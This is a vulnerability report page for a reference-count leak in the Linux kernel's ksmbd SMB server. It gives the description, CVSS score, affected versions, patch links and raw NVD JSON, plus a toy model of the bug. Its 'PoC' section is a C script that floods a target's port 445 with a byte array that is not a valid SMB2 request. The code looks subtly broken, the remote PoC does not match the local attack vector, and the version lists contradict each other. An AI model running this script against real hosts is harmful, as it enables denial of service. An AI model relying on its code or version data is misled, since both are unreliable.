Security Vulnerability Report
CVE-2025-71150 CVSS 5.5 MEDIUM

CVE-2025-71150

Published: 2026-01-23 15:16:06
Last Modified: 2026-04-18 09:16:13
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ksmbd: Fix refcount leak when invalid session is found on session lookup

When a session is found but its state is not SMB2_SESSION_VALID, it indicates that no valid session was found, but the code fails to decrement the reference count acquired by the session lookup, which results in a reference count leak. This patch fixes the issue by explicitly calling ksmbd_user_session_put to release the reference to the session.
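To make the leak described above concrete, here is an added toy model (constructed for this page, not ksmbd code) of a session lookup that hands out one reference per call: the buggy shape returns early on a non-VALID session without dropping that reference, while the fixed shape releases it on every exit path. Names such as session_lookup, session_put and leaked_refs are assumptions for the illustration.

```c
/* Toy model of the ksmbd session-lookup refcount bug; not kernel code. */
#include <stdbool.h>
#include <stddef.h>

enum { SESSION_NEW = 0, SESSION_VALID = 1, SESSION_EXPIRED = 2 };

struct session {
    int state;
    int refcount;   /* stands in for the kernel's refcount_t */
};

/* Every lookup that finds a session hands the caller one reference. */
static struct session *session_lookup(struct session *s) {
    s->refcount++;
    return s;
}

static void session_put(struct session *s) { s->refcount--; }

/* Buggy shape: a found-but-not-VALID session is treated as "not found",
 * yet the reference taken by the lookup is never dropped. */
bool lookup_buggy(struct session *s) {
    struct session *found = session_lookup(s);
    if (found->state != SESSION_VALID)
        return false;            /* reference leaked here */
    session_put(found);
    return true;
}

/* Fixed shape: the reference is released on the invalid-state path too. */
bool lookup_fixed(struct session *s) {
    struct session *found = session_lookup(s);
    if (found->state != SESSION_VALID) {
        session_put(found);      /* the missing put */
        return false;
    }
    session_put(found);
    return true;
}

/* Run n lookups against a session in the given state and report the
 * final refcount: 0 means balanced, anything else is the leak. */
int leaked_refs(bool (*lookup)(struct session *), int state, int n) {
    struct session s = { .state = state, .refcount = 0 };
    for (int i = 0; i < n; i++)
        lookup(&s);
    return s.refcount;
}
```

With the buggy variant the counter grows by one per lookup of an invalid session and the session can never be freed; with the fix it returns to zero.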

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - from 5.15.176 up to (excluding) 5.16 - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - from 6.1.121 up to (excluding) 6.1.160 - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - from 6.6.67 up to (excluding) 6.6.120 - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - from 6.12.6 up to (excluding) 6.12.64 - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - from 6.13.1 up to (excluding) 6.18.3 - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:* and 6.13 rc3 through rc7 - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
Linux kernel ksmbd (all versions prior to fix)
kernel stable 5.15.x < 5.15.162
kernel stable 6.1.x < 6.1.94
kernel stable 6.6.x < 6.6.33
kernel stable 6.12.x < 6.12.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-71150 PoC - Reference Count Leak in ksmbd session lookup
// This PoC demonstrates triggering the reference count leak condition
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   // needed for inet_addr(); was missing

#define SMB2_PORT 445
#define MAX_REQUESTS 10000

// Simulate SMB2 session lookup with invalid session state
int trigger_session_lookup_leak(int sock)
{
    // SMB2 Session Setup Request with invalid session
    unsigned char session_setup_req[] = {
        0x00, 0x00, 0x00, 0x00,                         // Structure size
        0x01, 0x00,                                     // Flags
        0x00, 0x00,                                     // Mode
        0x00, 0x00, 0x00, 0x00,                         // Capabilities
        0x00, 0x00, 0x00, 0x00,                         // Channel
        0x00, 0x00,                                     // Security blob length
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00  // Previous session id
    };

    // Send malformed session setup to trigger invalid session state
    send(sock, session_setup_req, sizeof(session_setup_req), 0);
    return 0;
}

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in server;
    // argv[argc] is NULL, so argv[1] is NULL when no target is given
    char *target_ip = (argc > 1 && argv[1]) ? argv[1] : "127.0.0.1";

    printf("[*] CVE-2025-71150 PoC - ksmbd session refcount leak\n");
    printf("[*] Target: %s:%d\n", target_ip, SMB2_PORT);

    for (int i = 0; i < MAX_REQUESTS; i++) {
        sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock < 0) {
            perror("[-] Socket creation failed");
            return 1;
        }

        memset(&server, 0, sizeof(server));   // zero padding bytes before use
        server.sin_family = AF_INET;
        server.sin_port = htons(SMB2_PORT);
        server.sin_addr.s_addr = inet_addr(target_ip);

        if (connect(sock, (struct sockaddr *)&server, sizeof(server)) == 0) {
            trigger_session_lookup_leak(sock);
        }
        close(sock);

        if (i % 100 == 0) {
            printf("[*] Sent %d requests...\n", i);
        }
    }

    printf("[+] Completed %d session lookup attempts\n", MAX_REQUESTS);
    return 0;
}

References

https://git.kernel.org/stable/c/02e06785e85b4bd86ef3d23b7c8d87acc76773d5 (Patch)
https://git.kernel.org/stable/c/0fb87b28cafae71e9c8248432cc3a6a1fd759efc (Patch)
https://git.kernel.org/stable/c/11fe566b442e3bc2774191740fd377739a87a1c0
https://git.kernel.org/stable/c/8cabcb4dd3dc85dd83a37d26efcc59a66a4074d7 (Patch)
https://git.kernel.org/stable/c/cafb57f7bdd57abba87725eb4e82bbdca4959644 (Patch)
https://git.kernel.org/stable/c/e54fb2a4772545701766cba08aab20de5eace8cd

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71150", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T15:16:05.773", "lastModified": "2026-04-18T09:16:13.153", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: Fix refcount leak when invalid session is found on session lookup\n\nWhen a session is found but its state is not SMB2_SESSION_VALID, It\nindicates that no valid session was found, but it is missing to decrement\nthe reference count acquired by the session lookup, which results in\na reference count leak. This patch fixes the issue by explicitly calling\nksmbd_user_session_put to release the reference to the session."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nksmbd: Soluciona la fuga de contador de referencias cuando se encuentra una sesión inválida en la búsqueda de sesión\n\nCuando se encuentra una sesión pero su estado no es SMB2_SESSION_VALID, indica que no se encontró ninguna sesión válida, pero falta decrementar el contador de referencias adquirido por la búsqueda de sesión, lo que resulta en una fuga de contador de referencias. 
Este parche soluciona el problema llamando explícitamente a ksmbd_user_session_put para liberar la referencia a la sesión."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.176", "versionEndExcluding": "5.16", "matchCriteriaId": "B11177EA-CF04-4864-B5AE-7597A4239BC3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.121", "versionEndExcluding": "6.1.160", "matchCriteriaId": "D8983128-8A47-4317-B02E-D9072E423085"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.67", "versionEndExcluding": "6.6.120", "matchCriteriaId": "B82378A7-0B64-484B-B28D-3A09913AEE0E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12.6", "versionEndExcluding": "6.12.64", "matchCriteriaId": "2D247316-17E2-4AF9-B5C9-DFF7DCADAE1E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.3", "matchCriteriaId": "1175098E-51C5-4022-AD0A-C8985F2787C6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": 
"5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc3:*:*:*:*:*:*", "matchCriteriaId": "DE491969-75AE-4A6B-9A58-8FC5AF98798F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc4:*:*:*:*:*:*", "matchCriteriaId": "93C0660D-7FB8-4FBA-892A-B064BA71E49E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc5:*:*:*:*:*:*", "matchCriteriaId": "034C36A6-C481-41F3-AE9A-D116E5BE6895"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc6:*:*:*:*:*:*", "matchCriteriaId": "8AF9DC49-2085-4FFB-A7E3-73DFAFECC7F2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:rc7:*:*:*:*:*:*", "matchCriteriaId": "5DFCDFB8-4FD0-465A-9076-D813D78FE51B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/02e06785e85b4bd86ef3d23b7c8d87acc76773d5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0fb87b28cafae71e9c8248432cc3a6a1fd759efc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/11fe566b442e3bc2774191740fd377739a87a1c0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/8cabcb4dd3dc85dd83a37d26efcc59a66a4074d7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cafb57f7bdd57abba87725eb4e82bbdca4959644", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e54fb2a4772545701766cba08aab20de5eace8cd", "source": "416baaa9- ... (truncated)